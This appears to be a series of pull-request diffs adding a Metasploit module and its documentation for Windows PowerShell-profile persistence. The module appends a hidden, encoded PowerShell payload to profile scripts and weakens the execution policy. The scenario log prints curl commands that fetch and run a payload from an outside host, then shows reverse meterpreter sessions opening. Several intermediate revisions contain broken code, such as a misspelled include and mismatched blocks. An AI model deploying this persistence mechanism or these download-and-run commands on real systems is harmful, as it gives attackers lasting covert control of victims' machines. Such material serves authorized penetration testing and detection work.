### PR TITLE
Windows Persistence: Powershell Profile

### DIFF
--- a/documentation/modules/exploit/windows/persistence/powershell_profile.md
+++ b/documentation/modules/exploit/windows/persistence/powershell_profile.md
@@ -1,0 +1,44 @@
+The following is the recommended format for module documentation. But feel free to add more content/sections to this.
+One of the general ideas behind these documents is to help someone troubleshoot the module if it were to stop
+functioning in 5+ years, so giving links or specific examples can be VERY helpful.
+
+## Vulnerable Application
+
+Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
+files, as well as instructions on installing/configuring the environment if it is different than a
+standard install. Much of this will come from the PR, and can be copy/pasted.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use [module path]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+List each option and how to use it.
+
+### Option Name
+
+Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
+
+## Scenarios
+Specific demo of using the module that might be useful in a real world scenario.
+
+### Version and OS
+
+```
+code or console output
+```
+
+For example:
+
+To do this specific thing, here's how you do it:
+
+```
+msf > use module_name
+msf auxiliary(module_name) > set POWERLEVEL >9000
+msf auxiliary(module_name) > exploit
+```

--- a/documentation/modules/exploit/windows/persistence/powershell_profile.md
+++ b/documentation/modules/exploit/windows/persistence/powershell_profile.md
@@ -1,8 +1,6 @@
 ## Vulnerable Application
 
-Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
-files, as well as instructions on installing/configuring the environment if it is different than a
-standard install. Much of this will come from the PR, and can be copy/pasted.
+This module establishes persistence by modifying a PowerShell profile script, which is automatically executed when PowerShell starts. The module supports multiple profile scopes (current user or all users) and safely backs up any existing profile prior to modification, enabling clean removal by restoring the original file.
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/windows/persistence/powershell_profile.md
+++ b/documentation/modules/exploit/windows/persistence/powershell_profile.md
@@ -1,6 +1,8 @@
 ## Vulnerable Application
 
-This module establishes persistence by modifying a PowerShell profile script, which is automatically executed when PowerShell starts. The module supports multiple profile scopes (current user or all users) and safely backs up any existing profile prior to modification, enabling clean removal by restoring the original file.
+This module establishes persistence by modifying a PowerShell profile script, which is automatically
+executed when PowerShell starts. The module supports multiple profile scopes (current user or all users) 
+and safely backs up any existing profile prior to modification, enabling clean removal by restoring the original file.
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/windows/persistence/powershell_profile.md
+++ b/documentation/modules/exploit/windows/persistence/powershell_profile.md
@@ -1,7 +1,3 @@
-The following is the recommended format for module documentation. But feel free to add more content/sections to this.
-One of the general ideas behind these documents is to help someone troubleshoot the module if it were to stop
-functioning in 5+ years, so giving links or specific examples can be VERY helpful.
-
 ## Vulnerable Application
 
 Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
@@ -9,36 +5,125 @@ files, as well as instructions on installing/configuring the environment if it i
 standard install. Much of this will come from the PR, and can be copy/pasted.
 
 ## Verification Steps
-Example steps in this format (is also in the PR):
 
-1. Install the application
 1. Start msfconsole
-1. Do: `use [module path]`
-1. Do: `run`
-1. You should get a shell.
+2. Get a shell on Windows
+3. Do: `use exploit/windows/persistence/powershell_profile`
+4. Do: `set payload [payload]`
+5. Do: `set session #`
+6. Do: `run`
+7. You should get a shell when powershell is opened on the target machine.
 
 ## Options
-List each option and how to use it.
 
-### Option Name
+### PROFILE
 
-Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
+The powershell profile to target. Choices are `AUTO`, `ALLUSERSALLHOSTS`, `ALLUSERSCURRENTHOST`, `CURRENTUSERALLHOSTS`, `CURRENTUSERCURRENTHOST`.
+Defaults to `AUTO`
+
+### CREATE
+
+If a profile file doesnt exist, create one. Defaults to `false`
+
+### EXECUTIONPOLICY
+
+Attempt to update execution policy to execute. Defaults to `true`
 
 ## Scenarios
-Specific demo of using the module that might be useful in a real world scenario.
 
-### Version and OS
+### Windows 10 1909 (10.0 Build 18363)
 
-```
-code or console output
-```
-
-For example:
-
-To do this specific thing, here's how you do it:
+Initial shell
 
 ```
-msf > use module_name
-msf auxiliary(module_name) > set POWERLEVEL >9000
-msf auxiliary(module_name) > exploit
+[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload windows/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use payload/cmd/windows/http/x64/meterpreter_reverse_tcp
+[*] Using configured payload windows/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set fetch_command CURL
+fetch_command => CURL
+resource (/root/.msf4/msfconsole.rc)> set fetch_pipe true
+fetch_pipe => true
+resource (/root/.msf4/msfconsole.rc)> set lport 4450
+lport => 4450
+resource (/root/.msf4/msfconsole.rc)> set FETCH_URIPATH w3
+FETCH_URIPATH => w3
+resource (/root/.msf4/msfconsole.rc)> set FETCH_FILENAME mkaKJBzbDB
+FETCH_FILENAME => mkaKJBzbDB
+resource (/root/.msf4/msfconsole.rc)> to_handler
+[*] Command served: curl -so %TEMP%\mkaKJBzbDB.exe http://1.1.1.1:8080/NB_U4Lr2Ty2xrjYqvzRVEg & start /B %TEMP%\mkaKJBzbDB.exe
+
+[*] Command to run on remote host: curl -s http://1.1.1.1:8080/w3|cmd
+[*] Payload Handler Started as Job 0
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /NB_U4Lr2Ty2xrjYqvzRVEg
+[*] Adding resource /w3
+[*] Started reverse TCP handler on 1.1.1.1:4450 
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > 
+[*] Client 2.2.2.2 requested /w3
+[*] Sending payload to 2.2.2.2 (curl/7.79.1)
+[*] Client 2.2.2.2 requested /NB_U4Lr2Ty2xrjYqvzRVEg
+[*] Sending payload to 2.2.2.2 (curl/7.79.1)
+[*] Meterpreter session 1 opened (1.1.1.1:4450 -> 2.2.2.2:55201) at 2026-02-04 17:06:23 -0500
+
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : WIN10PROLICENSE
+OS              : Windows 10 1909 (10.0 Build 18363).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: WIN10PROLICENSE\windows
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Install Persistence
+
+```
+msf payload(cmd/windows/http/x64/meterpreter_reverse_tcp) > use exploit/windows/persistence/powershell_profile 
+[*] Using configured payload windows/meterpreter/reverse_tcp
+msf exploit(windows/persistence/powershell_profile) > set create true
+create => true
+msf exploit(windows/persistence/powershell_profile) > set EXECUTIONPOLICY true
+EXECUTIONPOLICY => true
+msf exploit(windows/persistence/powershell_profile) > set session 1
+session => 1
+msf exploit(windows/persistence/powershell_profile) > rexploit
+[*] Reloading module...
+[*] Exploit running as background job 2.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+msf exploit(windows/persistence/powershell_profile) > [*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Powershell execution policy for CurrentUser (Undefined), will attempt to override
+[*] Updating Powershell execution policy for CurrentUser to RemoteSigned
+[*] C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 does not exist, creating it...
+[-] Failed to create profile file at C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1
+[*] C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 does not exist, creating it...
+[-] Failed to create profile file at C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1
+[*] C:\Users\windows\Documents\WindowsPowerShell\profile.ps1 does not exist, creating it...
+[*] Powershell command length: 4193
+[*] Appending payload to C:\Users\windows\Documents\WindowsPowerShell\profile.ps1
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20260204.1237/WIN10PROLICENSE_20260204.1237.rc
+```
+
+Start powershell on the target computer
+
+```
+[*] Sending stage (190534 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:55207) at 2026-02-04 17:13:02 -0500
 ```

--- a/modules/exploits/windows/persistence/powershell_profile.rb
+++ b/modules/exploits/windows/persistence/powershell_profile.rb
@@ -18,8 +18,9 @@ class MetasploitModule < Msf::Exploit::Local
         info,
         'Name' => 'Powershell Profile Persistence',
         'Description' => %q{
-          This exploit sample shows how a persistence module could be written
-          for a linux computer.
+          This module establishes persistence by modifying a PowerShell profile script, which is automatically
+          executed when PowerShell starts. The module supports multiple profile scopes (current user or all users) 
+          and safely backs up any existing profile prior to modification, enabling clean removal by restoring the original file.
         },
         'License' => MSF_LICENSE,
         'Author' => [

--- a/modules/exploits/windows/persistence/powershell_profile.rb
+++ b/modules/exploits/windows/persistence/powershell_profile.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Local
         'Name' => 'Powershell Profile Persistence',
         'Description' => %q{
           This module establishes persistence by modifying a PowerShell profile script, which is automatically
-          executed when PowerShell starts. The module supports multiple profile scopes (current user or all users) 
+          executed when PowerShell starts. The module supports multiple profile scopes (current user or all users)
           and safely backs up any existing profile prior to modification, enabling clean removal by restoring the original file.
         },
         'License' => MSF_LICENSE,

--- a/modules/exploits/windows/persistence/powershell_profile.rb
+++ b/modules/exploits/windows/persistence/powershell_profile.rb
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Local
           'madefourit'
         ],
         'Platform' => [ 'win' ],
-        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+        'Arch' => [ARCH_X64, ARCH_X86],
         'SessionTypes' => [ 'meterpreter' ],
         'Targets' => [[ 'Auto', {} ]],
         'References' => [

--- a/modules/exploits/windows/persistence/powershell_profile.rb
+++ b/modules/exploits/windows/persistence/powershell_profile.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
 
@@ -26,20 +25,20 @@ class MetasploitModule < Msf::Exploit::Local
         'Name' => 'Powershell Profile Persistence',
         'Description' => %q{
           This exploit sample shows how a persistence module could be written
-          for a linux computer. 
+          for a linux computer.
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'madefourit', 
-          'researcher'
+          'madefourit'
         ],
         'Platform' => [ 'win' ],
         'Arch' => [ ARCH_CMD ],
-        'SessionTypes' => [ 'meterpreter' ], 
+        'SessionTypes' => [ 'meterpreter' ],
         'Targets' => [[ 'Auto', {} ]],
         'References' => [
-          ['ATT&CK', Mitre::Attack::Technique::T1546_013_POWERSHELL_PROFILE], 
-          [ 'URL', 'https://pentestlab.blog/2019/11/05/persistence-powershell-profile/'],
+          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],
+          ['ATT&CK', Mitre::Attack::Technique::T1546_013_POWERSHELL_PROFILE],
+          [ 'URL', 'https://pentestlab.blog/2019/11/05/persistence-powershell-profile/']
         ],
         'DisclosureDate' => '2019-11-05',
         'DefaultTarget' => 0,
@@ -50,11 +49,13 @@ class MetasploitModule < Msf::Exploit::Local
         }
       )
     )
+    #options
+    register_options [
+      OptEnum.new('PROFILE', [true, 'The powershell profile to target.', 'AUTO', ['AUTO', 'ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST']])
+    ]
     # force exploit is used to bypass the check command results
     register_advanced_options [
       OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
-      OptEnum.new('PROFILE', [true, 'The powershell profile to target.', 'AUTO', ['AUTO', 'ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST']
-])
     ]
   end
 
@@ -72,30 +73,33 @@ class MetasploitModule < Msf::Exploit::Local
   # The install_persistence method installs the persistence, starts the handler, and does all
   # the main activities
   #
-  def install_persistence
-    file_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(5..10)
-    backdoor = "#{path}/#{file_name}"
-    vprint_status("Writing backdoor to #{backdoor}")
-    # if an arch_cmd payload is selected, write and chmod the file
-    # if an exe payload is selected, write it as an executable file
-    if payload.arch.first == 'cmd'
-      write_file(backdoor, payload.encoded)
-      chmod(backdoor, 0o755)
-    else
-      upload_and_chmodx backdoor, generate_payload_exe
-    end
-    # add removing the file to the cleanup script. The script starts as nil, so we want to overwrite it to a string
-    @clean_up_rc = "rm #{backdoor}\n"
-
-    # back up an example file that we're going to write into so we can restore it
-    # in our cleanup efforts
-    example_file = read_file('/tmp/example_file')
-    backup_file = store_loot('example.file', 'text/plain', session, example_file, 'example_file', '/tmp/example_file backup')
-    print_status("Created /tmp/example_file backup: #{backup_file}")
-    # @clean_up_rc is our instance variable string that tracks what needs to be done to remove the persistence by the user.
-    @clean_up_rc << "upload #{backup_file} /tmp/example_file\n"
-    write_file('/tmp/example_file', backdoor)
-
-    # the cleanup script will automatically be printed when the module is finished
+  def backdoor_profile(profile_file)
+    unless readable?(profile_file)
+    print_error("#{profile_file} can not be read")
+    return
   end
+
+  pfile = read_file(profile_file)
+  backup_file = store_loot(
+      'powershell.profile', 
+      'text/plain', 
+      session, 
+      pfile, profile_file.split('\\').last,
+      'powershell profile backup'
+    )
+
+  print_status("Created #{profile_file} backup: #{backup_file}")
+end
+
+  def install_persistence
+    profiles = JSON.parse(cmd_exec('$PROFILE | Select-Object * | ConvertTo-Json;'))
+    profiles= profiles.transform_keys { |k| k.upcase }
+    case datastore['PROFILE']
+    when 'AUTO'
+    when 'ALLUSERSALLHOSTS'
+    when 'ALLUSERSCURRENTHOST'
+    when 'CURRENTUSERALLHOSTS'
+    when 'CURRENTUSERCURRENTHOST'
+  end
+end
 end

--- a/modules/exploits/windows/persistence/powershell_profile.rb
+++ b/modules/exploits/windows/persistence/powershell_profile.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Local
         }
       )
     )
-    #options
+    # options
     register_options [
       OptEnum.new('PROFILE', [true, 'The powershell profile to target.', 'AUTO', ['AUTO', 'ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST']])
     ]
@@ -75,31 +75,43 @@ class MetasploitModule < Msf::Exploit::Local
   #
   def backdoor_profile(profile_file)
     unless readable?(profile_file)
-    print_error("#{profile_file} can not be read")
-    return
-  end
+      print_error("#{profile_file} can not be read")
+      return
+    end
 
-  pfile = read_file(profile_file)
-  backup_file = store_loot(
-      'powershell.profile', 
-      'text/plain', 
-      session, 
+    pfile = read_file(profile_file)
+    backup_file = store_loot(
+      'powershell.profile',
+      'text/plain',
+      session,
       pfile, profile_file.split('\\').last,
       'powershell profile backup'
     )
 
-  print_status("Created #{profile_file} backup: #{backup_file}")
-end
+    print_status("Created #{profile_file} backup: #{backup_file}")
+  end
 
   def install_persistence
     profiles = JSON.parse(cmd_exec('$PROFILE | Select-Object * | ConvertTo-Json;'))
-    profiles= profiles.transform_keys { |k| k.upcase }
+    profiles.transform_keys { |k| k.upcase }
     case datastore['PROFILE']
     when 'AUTO'
-    when 'ALLUSERSALLHOSTS'
-    when 'ALLUSERSCURRENTHOST'
-    when 'CURRENTUSERALLHOSTS'
-    when 'CURRENTUSERCURRENTHOST'
-  end
+      ['ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST'].each do |profile|
+    unless profiles.key?(datastore['PROFILE'])
+        print_error("#{datastore['PROFILE']} not found in user's profiles")
+        return
+    end
+    success = backdoor_profile(profiles[datastore['PROFILE']])
+    return if success
 end
+    when 'ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS','CURRENTUSERCURRENTHOST'
+      unless profiles.key?(datastore['PROFILE'])
+      print_error("#{datastore['PROFILE']} not found in user's profiles")
+      return
+    end
+backdoor_profile(profiles[datastore['PROFILE']])
+    append_file(profile_file, "\n#{payload.encoded}")
+      @clean_up_rc << "upload #{backup_file} #{profile_file}\n"
+    end
+  end
 end

--- a/modules/exploits/windows/persistence/powershell_profile.rb
+++ b/modules/exploits/windows/persistence/powershell_profile.rb
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Local
           'madefourit'
         ],
         'Platform' => [ 'win' ],
-        'Arch' => [ ARCH_CMD ],
+        'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
         'SessionTypes' => [ 'meterpreter' ],
         'Targets' => [[ 'Auto', {} ]],
         'References' => [
@@ -44,17 +44,37 @@ class MetasploitModule < Msf::Exploit::Local
       )
     )
     register_options [
-      OptEnum.new('PROFILE', [true, 'The powershell profile to target.', 'AUTO', ['AUTO', 'ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST']])
+      OptEnum.new('PROFILE', [true, 'The powershell profile to target.', 'AUTO', ['AUTO', 'ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST']]),
+      OptBool.new('CREATE', [false, 'If a profile file doesnt exist, create one.', false]),
+      OptBool.new('EXECUTIONPOLICY', [false, 'Attempt to update execution policy to execute .', true]),
     ]
-    register_advanced_options [
-      OptBool.new('CREATE', [true, 'If a profile file doesnt exist, create one.', false])
-    ]
+  end
+
+  def policy_allows_execution?
+    # Get-ExecutionPolicy -List has words, but when converting to json to read easily it gives numbers, so we have to map them back
+    execution_policies = cmd_exec('powershell -NoProfile -Command "$h = @{}; Get-ExecutionPolicy -List | ForEach-Object { $h[$_.Scope.ToString()] = $_.ExecutionPolicy.ToString() }; $h | ConvertTo-Json"')
+    begin
+      @policies = JSON.parse(execution_policies)
+    rescue JSON::ParserError => e
+      print_error("Failed to parse powershell execution policies: #{execution_policies}")
+      return false
+    end
+    return ['Unrestricted', 'RemoteSigned', 'Bypass'].include?(@policies['CurrentUser'])
   end
 
   def check
     return Msf::Exploit::CheckCode::Safe('System does not have powershell') unless registry_enumkeys('HKLM\\SOFTWARE\\Microsoft').include?('PowerShell')
 
-    CheckCode::Detected('Powershell is installed on the target system')
+    unless policy_allows_execution?
+      if datastore['EXECUTIONPOLICY']
+        return Msf::Exploit::CheckCode::Appears("Powershell execution policy for CurrentUser (#{@policies['CurrentUser']}), will attempt to override")
+      else
+        return Msf::Exploit::CheckCode::Safe("Powershell execution policy for CurrentUser (#{@policies['CurrentUser']}) doesn't allow script execution, try setting EXECUTIONPOLICY")
+      end
+    end
+    vprint_status("Powershell execution policy for CurrentUser (#{@policies['CurrentUser']})")
+
+    CheckCode::Appears('Powershell is installed on the target system')
   end
 
   def backdoor_profile(profile_file)
@@ -62,6 +82,13 @@ class MetasploitModule < Msf::Exploit::Local
     unless file?(profile_file)
       if datastore['CREATE']
         print_status("#{profile_file} does not exist, creating it...")
+        folders = profile_file.split('\\')[0..-2]
+        folders = folders.join('\\')
+        # we can't use mkdir here because register_dir_for_cleanup gets called, and we handle our own cleanups
+        unless directory?(folders)
+          cmd_exec("cmd /c \"md #{folders}\"")
+          @clean_up_rc << "rmdir #{folders.gsub('\\', '/')}\n"
+        end
         write_file(profile_file, '')
         module_created_file = true
       else
@@ -71,33 +98,60 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     if module_created_file
-      @clean_up_rc << "rm #{profile_file}\n"
+      @clean_up_rc << "rm #{profile_file.gsub('\\', '/')}\n"
     else
-      unless readable?(profile_file)
-        print_error("#{profile_file} can not be read")
-        return false
-      end
-
       pfile = read_file(profile_file)
-      backup_file = store_loot(
-        'powershell.profile',
-        'text/plain',
-        session,
-        pfile, profile_file.split('\\').last,
-        'powershell profile backup'
-      )
+      if pfile.nil?
+        vprint_warning("Unable to read (and backup) existing profile file at #{profile_file}, continuing without backup")
+      else
+        backup_file = store_loot(
+          'powershell.profile',
+          'text/plain',
+          session,
+          pfile, profile_file.split('\\').last,
+          'powershell profile backup'
+        )
 
-      print_status("Created #{profile_file} backup: #{backup_file}")
-      @clean_up_rc << "upload #{backup_file} #{profile_file}\n"
+        print_status("Created #{profile_file} backup: #{backup_file}")
+        @clean_up_rc << "upload #{backup_file} #{profile_file}\n"
+      end
     end
 
-    append_file(profile_file, "\n#{payload.encoded}")
+    download_and_run = encode_script(payload.encoded)
+    pload = generate_psh_command_line(noprofile: true, windowstyle: 'hidden', encodedcommand: download_and_run)
+    # pload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)
+    # now we want to change this to run threaded
+    # pload = "Start-Process powershell.exe -ArgumentList '-nop', '-w hidden', '-c', #{pload.split('-c')[1..].join('-c').strip.gsub('$', '\\$')}"
+    # pload = pload.split('-c')
+    # pload = pload[1..]
+    # pload = pload.join('-c').strip
+    # pload = pload[1..-2] # remove double quotes
+    # puts pload.split('-c')[1..].join('-c').strip
+    # pload = Rex::Text.encode_base64(pload)
+    # puts pload
+    # pload = "Start-Process powershell.exe -ArgumentList '-nop', '-w hidden', '-encodedcommand #{pload}'"
+    # puts pload
+
+    append_file(profile_file, "\n#{pload}\n")
     true
   end
 
   def install_persistence
-    profiles = JSON.parse(cmd_exec('powershell -Command "$PROFILE | Select-Object * | ConvertTo-Json"'))
-    profiles.transform_keys(&:upcase)
+    policy = cmd_exec('powershell -NoProfile -Command "$PROFILE | Select-Object * | ConvertTo-Json"')
+    begin
+      profiles = JSON.parse(policy)
+    rescue JSON::ParserError => e
+      print_error("Failed to parse powershell profile paths: #{policy}")
+      return
+    end
+    profiles = profiles.transform_keys { |k| k.to_s.upcase }
+
+    if !policy_allows_execution? && datastore['EXECUTIONPOLICY']
+      print_status('Updating Powershell execution policy for CurrentUser to RemoteSigned')
+      puts cmd_exec('powershell -NoProfile -Command "Set-ExecutionPolicy -Scope CurrentUser RemoteSigned"')
+      @clean_up_rc << "execute -f powershell -a \"-Command 'Set-ExecutionPolicy -Scope CurrentUser #{@policies['CurrentUser']}'\"\n"
+    end
+
     case datastore['PROFILE']
     when 'AUTO'
       ['ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST'].each do |profile|

--- a/modules/exploits/windows/persistence/powershell_profile.rb
+++ b/modules/exploits/windows/persistence/powershell_profile.rb
@@ -1,0 +1,101 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
+
+  # includes writable?, upload_file, upload_and_chmodx, exploit_data
+  include Msf::Post::File
+  # includes pwsh
+  inlude Msft::Exploit::Powershell
+  # includes generate_payload_exe
+  include Msf::Exploit::EXE
+  # defines install_persistence and does our cleanup
+  # WritableDir
+  include Msf::Exploit::Local::Persistence
+  # runs check automatically
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Powershell Profile Persistence',
+        'Description' => %q{
+          This exploit sample shows how a persistence module could be written
+          for a linux computer. 
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'madefourit', 
+          'researcher'
+        ],
+        'Platform' => [ 'win' ],
+        'Arch' => [ ARCH_CMD ],
+        'SessionTypes' => [ 'meterpreter' ], 
+        'Targets' => [[ 'Auto', {} ]],
+        'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1546_013_POWERSHELL_PROFILE], 
+          [ 'URL', 'https://pentestlab.blog/2019/11/05/persistence-powershell-profile/'],
+        ],
+        'DisclosureDate' => '2019-11-05',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
+        }
+      )
+    )
+    # force exploit is used to bypass the check command results
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+      OptEnum.new('PROFILE', [true, 'The powershell profile to target.', 'AUTO', ['AUTO', 'ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST']
+])
+    ]
+  end
+
+  def check
+    # Check a example app is installed
+    print_warning('Payloads in /tmp will only last until reboot, you may want to choose elsewhere.') if writable_dir.start_with?('/tmp')
+    return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)
+    return CheckCode::Safe("#{writable_dir} isnt writable") unless writable?(writable_dir)
+    return CheckCode::Safe('example app is required') unless command_exists?('example')
+
+    CheckCode::Detected('example app is installed')
+  end
+
+  #
+  # The install_persistence method installs the persistence, starts the handler, and does all
+  # the main activities
+  #
+  def install_persistence
+    file_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(5..10)
+    backdoor = "#{path}/#{file_name}"
+    vprint_status("Writing backdoor to #{backdoor}")
+    # if an arch_cmd payload is selected, write and chmod the file
+    # if an exe payload is selected, write it as an executable file
+    if payload.arch.first == 'cmd'
+      write_file(backdoor, payload.encoded)
+      chmod(backdoor, 0o755)
+    else
+      upload_and_chmodx backdoor, generate_payload_exe
+    end
+    # add removing the file to the cleanup script. The script starts as nil, so we want to overwrite it to a string
+    @clean_up_rc = "rm #{backdoor}\n"
+
+    # back up an example file that we're going to write into so we can restore it
+    # in our cleanup efforts
+    example_file = read_file('/tmp/example_file')
+    backup_file = store_loot('example.file', 'text/plain', session, example_file, 'example_file', '/tmp/example_file backup')
+    print_status("Created /tmp/example_file backup: #{backup_file}")
+    # @clean_up_rc is our instance variable string that tracks what needs to be done to remove the persistence by the user.
+    @clean_up_rc << "upload #{backup_file} /tmp/example_file\n"
+    write_file('/tmp/example_file', backdoor)
+
+    # the cleanup script will automatically be printed when the module is finished
+  end
+end

--- a/modules/exploits/windows/persistence/powershell_profile.rb
+++ b/modules/exploits/windows/persistence/powershell_profile.rb
@@ -60,11 +60,9 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    # Check a example app is installed
-    print_warning('Payloads in /tmp will only last until reboot, you may want to choose elsewhere.') if writable_dir.start_with?('/tmp')
     return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)
     return CheckCode::Safe("#{writable_dir} isnt writable") unless writable?(writable_dir)
-    return CheckCode::Safe('example app is required') unless command_exists?('example')
+    return Msf::Exploit::CheckCode::Safe('System does not have powershell') unless registry_enumkeys('HKLM\\SOFTWARE\\Microsoft').include?('PowerShell')
 
     CheckCode::Detected('example app is installed')
   end
@@ -89,6 +87,8 @@ class MetasploitModule < Msf::Exploit::Local
     )
 
     print_status("Created #{profile_file} backup: #{backup_file}")
+    append_file(profile_file, "\n#{payload.encoded}")
+    @clean_up_rc << "upload #{backup_file} #{profile_file}\n"
   end
 
   def install_persistence
@@ -96,22 +96,19 @@ class MetasploitModule < Msf::Exploit::Local
     profiles.transform_keys { |k| k.upcase }
     case datastore['PROFILE']
     when 'AUTO'
-      ['ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST'].each do |profile|
-    unless profiles.key?(datastore['PROFILE'])
+      ['ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST'].each do |_profile|
+        unless profiles.key?(datastore['PROFILE'])
+          print_error("#{datastore['PROFILE']} not found in user's profiles")
+          return
+        end
+        success = backdoor_profile(profiles[datastore['PROFILE']])
+        return if success
+      end
+    when 'ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS', 'CURRENTUSERCURRENTHOST'
+      unless profiles.key?(datastore['PROFILE'])
         print_error("#{datastore['PROFILE']} not found in user's profiles")
         return
-    end
-    success = backdoor_profile(profiles[datastore['PROFILE']])
-    return if success
-end
-    when 'ALLUSERSALLHOSTS', 'ALLUSERSCURRENTHOST', 'CURRENTUSERALLHOSTS','CURRENTUSERCURRENTHOST'
-      unless profiles.key?(datastore['PROFILE'])
-      print_error("#{datastore['PROFILE']} not found in user's profiles")
-      return
-    end
-backdoor_profile(profiles[datastore['PROFILE']])
-    append_file(profile_file, "\n#{payload.encoded}")
-      @clean_up_rc << "upload #{backup_file} #{profile_file}\n"
+      end
+      backdoor_profile(profiles[datastore['PROFILE']])
     end
   end
-end

--- a/modules/exploits/windows/persistence/powershell_profile.rb
+++ b/modules/exploits/windows/persistence/powershell_profile.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Local
       print_error("Failed to parse powershell execution policies: #{execution_policies}")
       return false
     end
-    return ['Unrestricted', 'RemoteSigned', 'Bypass'].include?(@policies['CurrentUser'])
+    ['Unrestricted', 'RemoteSigned', 'Bypass'].include?(@policies['CurrentUser'])
   end
 
   def check
@@ -89,7 +89,10 @@ class MetasploitModule < Msf::Exploit::Local
